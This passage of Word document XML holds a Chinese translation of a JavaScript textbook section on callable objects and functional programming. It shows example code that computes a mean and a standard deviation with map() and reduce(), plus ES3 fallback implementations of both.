      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>类数组对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>并不是真正的数组，但大部分场景下可以将其当做数组来对待。对于函数也存在类似的情况。</w:t>
      </w:r>
      <w:r>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:t>可调用的对象</w:t>
      </w:r>
      <w:r>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>callable object</w:t>
      </w:r>
      <w:r>
        <w:t>）是一个对象，可以在函数调用表达式中调用这</w:t>
      </w:r>
      <w:r>
        <w:t>个对象。所有的函数都是可调用的，但并非所有的可调用对象都是函数。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>截至目前，可调用对象在两个</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>实现中不能算作函数。首先，</w:t>
      </w:r>
      <w:r>
        <w:t>IE Web</w:t>
      </w:r>
      <w:r>
        <w:t>浏览器（</w:t>
      </w:r>
      <w:r>
        <w:t>IE8</w:t>
      </w:r>
      <w:r>
        <w:t>及之前的版本）实现了客户端方法（诸如</w:t>
      </w:r>
      <w:r>
        <w:t>Window.alert()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Document.getElementsById()</w:t>
      </w:r>
      <w:r>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[17]</w:t>
      </w:r>
      <w:r>
        <w:t>，使用了可调用的宿主对象，而不是内置函数对象。</w:t>
      </w:r>
      <w:r>
        <w:t>IE</w:t>
      </w:r>
      <w:r>
        <w:t>中的这些方法在其他浏览器中也都存在，但它们本质上不是</w:t>
      </w:r>
      <w:r>
        <w:t>Function</w:t>
      </w:r>
      <w:r>
        <w:t>对象。</w:t>
      </w:r>
      <w:r>
        <w:t>IE9</w:t>
      </w:r>
      <w:r>
        <w:t>将它们实现为真正的函数，因此这类可调用的对象将越来越罕见。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>另外一个常见的可调用对象是</w:t>
      </w:r>
      <w:r>
        <w:t>Re</w:t>
      </w:r>
      <w:r>
        <w:t>gExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象（在众多浏览器中均有实现），可以直接调用</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象，这比调用它的</w:t>
      </w:r>
      <w:r>
        <w:t>exec()</w:t>
      </w:r>
      <w:r>
        <w:t>方法更快捷一些。在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中这是一个彻头彻尾的非标准特性，最开始是由</w:t>
      </w:r>
      <w:r>
        <w:t>Netscape</w:t>
      </w:r>
      <w:r>
        <w:t>提出，后被其他浏览器厂商所复制，仅仅是为了和</w:t>
      </w:r>
      <w:r>
        <w:t>Netscape</w:t>
      </w:r>
      <w:r>
        <w:t>兼容。代码最好不要对可调用的</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>对象有太多依赖，这个特性在不久的将来可能会废弃并删除。对</w:t>
      </w:r>
      <w:r>
        <w:t>RegExp</w:t>
      </w:r>
      <w:r>
        <w:t>执行</w:t>
      </w:r>
      <w:r>
        <w:t>typeof</w:t>
      </w:r>
      <w:r>
        <w:t>运算的结果并不统一，在有些浏览器中返回</w:t>
      </w:r>
      <w:r>
        <w:t>"function"</w:t>
      </w:r>
      <w:r>
        <w:t>，在有些中返回</w:t>
      </w:r>
      <w:r>
        <w:t>"object"</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果想检测一个对象是否是真正的函数对象（并且具</w:t>
      </w:r>
      <w:r>
        <w:t>有函数方法），可以参照例</w:t>
      </w:r>
      <w:r>
        <w:t>6-4</w:t>
      </w:r>
      <w:r>
        <w:t>中的代码检测它的</w:t>
      </w:r>
      <w:r>
        <w:t>class</w:t>
      </w:r>
      <w:r>
        <w:t>属性（见</w:t>
      </w:r>
      <w:r>
        <w:t>6.8.2</w:t>
      </w:r>
      <w:r>
        <w:t>节）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function isFunction(x){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return Object.prototype.toString.call(x)==="[object Function]";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注意，这里的</w:t>
      </w:r>
      <w:r>
        <w:t>isFunction()</w:t>
      </w:r>
      <w:r>
        <w:t>函数和</w:t>
      </w:r>
      <w:r>
        <w:t>7.10</w:t>
      </w:r>
      <w:r>
        <w:t>节的</w:t>
      </w:r>
      <w:r>
        <w:t>isArray()</w:t>
      </w:r>
      <w:r>
        <w:t>函数极其类似。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:spacing w:before="240" w:after="240"/>
      </w:pPr>
      <w:bookmarkStart w:id="216" w:name="8_8_Han_Shu_Shi_Bian_Cheng_"/>
      <w:r>
        <w:t>8.8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　函数式编程</w:t>
      </w:r>
      <w:bookmarkEnd w:id="216"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Lisp</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>Haskell</w:t>
      </w:r>
      <w:r>
        <w:t>不同，</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>并非函数式编程语言，但在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中可以像操控对象一样操控函数，也就是说可以在</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中应用函数式编程技术。</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 5</w:t>
      </w:r>
      <w:r>
        <w:t>中的数组方法（诸如</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>）就可以非常适合用于函数式编程风格。接下来的几节将会着重介绍</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>中的函数式编程技术。对</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数的探讨会让人倍感兴奋，你会体会到</w:t>
      </w:r>
      <w:r>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:t>函数非常强大，而不仅仅是学习一种编程风格而已</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1Text"/>
        </w:rPr>
        <w:t>[18]</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:spacing w:before="319" w:after="319"/>
      </w:pPr>
      <w:bookmarkStart w:id="217" w:name="8_8_1_Shi_Yong_Han_Shu_Chu_Li_Shu_Zu_"/>
      <w:r>
        <w:t>8.8.1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">　使用函数处理数组</w:t>
      </w:r>
      <w:bookmarkEnd w:id="217"/>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>假设有一个数组，数组元素都是数字，我们想要计算这些元素的平均值和标准差。若使用非函数式编程风格的话，代码会是这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data=[1,1,3,5,5];//</w:t>
      </w:r>
      <w:r>
        <w:t>这里是待处理的数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>平均数是所有元素的累加和值除以元素个数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var total=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>data.length;i++)total+=data[i];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var mean=total/data.length;//</w:t>
      </w:r>
      <w:r>
        <w:t>平均数是</w:t>
      </w:r>
      <w:r>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>计算标准差，首先计算每个数据减去平均数之后偏差的平方然后求和</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>total=0;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>data.length;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var deviation=data[i]-mean;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>total+=deviation*deviation;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var stddev=Math.sqrt(total/(data.length-1));//</w:t>
      </w:r>
      <w:r>
        <w:t>标准差的值是</w:t>
      </w:r>
      <w:r>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>可以使用数组方法</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>来实现同样的计算，这种实现极其简洁（参照</w:t>
      </w:r>
      <w:r>
        <w:t>7.9</w:t>
      </w:r>
      <w:r>
        <w:t>节来查看这些方法）：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>首先定义两个简单的函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var sum=function(x,y){return x+</w:t>
      </w:r>
      <w:r>
        <w:t>y;};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var square=function(x){return x*x;};//</w:t>
      </w:r>
      <w:r>
        <w:t>然后将这些函数和数组方法配合使用计算出平均数和标准差</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data=[1,1,3,5,5];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var mean=data.reduce(sum)/data.length;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var deviations=data.map(function(x){return x-mean;});</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var stddev=Math.sqrt(deviations.map(square).reduce(sum)/(data.length-1)</w:t>
      </w:r>
      <w:r>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:pStyle w:val="Para01"/>
        <w:spacing w:before="240" w:after="240"/>
        <w:ind w:firstLine="640"/>
      </w:pPr>
      <w:r>
        <w:t>如果我们基于</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>来如何实现呢？因为</w:t>
      </w:r>
      <w:r>
        <w:t>ECMAScript 3</w:t>
      </w:r>
      <w:r>
        <w:t>中并不包含这些数组方法，如果不存在内置方法的话我们可以自定义</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>对于每个数组元素调用函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>，并返回一个结果数组</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>Array.prototype.map</w:t>
      </w:r>
      <w:r>
        <w:t>定义了的话，就使用这个方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var map=Array.prototype.map</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>?function(a,f){return a.map(f);}//</w:t>
      </w:r>
      <w:r>
        <w:t>如果已经存在</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>方法，就直接使用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>:function(a,f){//</w:t>
      </w:r>
      <w:r>
        <w:t>否则，自己实现一个</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var results=[];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>for(var i=0,len=a.length;i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>len;i++){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(i in a)results[i]=f.call(null,a[i],i,a);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>return results;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>使用函数</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
      <w:r>
        <w:t>和可选的初始值将数组</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t>减至一个值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>Array.prototype.reduce</w:t>
      </w:r>
      <w:r>
        <w:t>存在的话，就使用这个方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var reduce=Array.prototype.reduce</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>?function(a,f</w:t>
      </w:r>
      <w:r>
        <w:t>,initial){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>方法存在的话</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(arguments.length</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>2)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return a.reduce(f,initial);//</w:t>
      </w:r>
      <w:r>
        <w:t>如果传入了一个初始值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else return a.reduce(f);//</w:t>
      </w:r>
      <w:r>
        <w:t>否则没有初始值</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>:function(a,f,initial){//</w:t>
      </w:r>
      <w:r>
        <w:t>这个算法来自</w:t>
      </w:r>
      <w:r>
        <w:t>ES5</w:t>
      </w:r>
      <w:r>
        <w:t>规范</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var i=0,len=a.length,accumulator;//</w:t>
      </w:r>
      <w:r>
        <w:t>以特定的初始值开始，否则第一个值取自</w:t>
      </w:r>
      <w:r>
        <w:t>a</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(arguments.length</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>2)accumulator=in</w:t>
      </w:r>
      <w:r>
        <w:t>itial;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>找到数组中第一个已定义的索引</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(len==0)throw TypeError();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>len){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(i in a){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>accumulator=a[i++];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else i++;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(i==len)throw TypeError();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>对于数组中剩下的元素依次调用</w:t>
      </w:r>
      <w:r>
        <w:t>f()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>while(i</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>len){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(i in a)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>accumulator=f.call(undefined,accumulator,a[i],i,a);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>i++;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>return accumulator;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使用定义的</w:t>
      </w:r>
      <w:r>
        <w:t>map()</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>reduce()</w:t>
      </w:r>
      <w:r>
        <w:t>函数，计算平均值和标准差的代码看起来像这样：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00210880">
      <w:pPr>
        <w:pStyle w:val="0Block"/>
        <w:spacing w:before="120" w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var data=[1,1,3,5,5];</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>var sum=function(x,y){return x+y;};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var square=function(x){return x*x;};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
